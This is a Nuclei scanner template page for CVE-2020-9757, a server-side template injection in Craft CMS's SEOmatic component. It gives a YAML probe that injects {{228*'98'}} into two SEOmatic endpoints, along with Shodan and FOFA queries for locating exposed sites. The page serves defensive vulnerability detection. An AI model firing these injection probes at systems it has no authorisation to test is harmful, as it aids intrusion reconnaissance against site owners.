Skip to content
Nuclei Templates

Craft CMS < 3.3.0 - Server-Side Template Injection

ID: CVE-2020-9757

Severity: critical

Author: dwisiswant0

Tags: cve,cve2020,ssti,craftcms

Description

Section titled “Description”

Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.

YAML Source

Section titled “YAML Source”
id: CVE-2020-9757


info:
  name: Craft CMS < 3.3.0 - Server-Side Template Injection
  author: dwisiswant0
  severity: critical
  description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server.
  remediation: |
    Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
  reference:
    - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
    - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
    - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
    - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9757
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9757
    cwe-id: CWE-74
    epss-score: 0.96294
    epss-percentile: 0.99536
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:craftcms
      - http.favicon.hash:-47932290
    fofa-query:
      - icon_hash=-47932290
      - body=craftcms
    publicwww-query: craftcms
  tags: cve,cve2020,ssti,craftcms


http:
  - method: GET
    path:
      - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
      - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"


    skip-variables-check: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "MetaLinkContainer"
          - "canonical"
          - "22344"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a004730450221008d84dc8074117b2d01919c19ec705db3d7f1274ca4cb928bf69b3848162586820220166e435725709ab262c12f39fc61d81bfe653fe77225a04bc6ff335ea9e06504:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-9757.yaml"

View on Github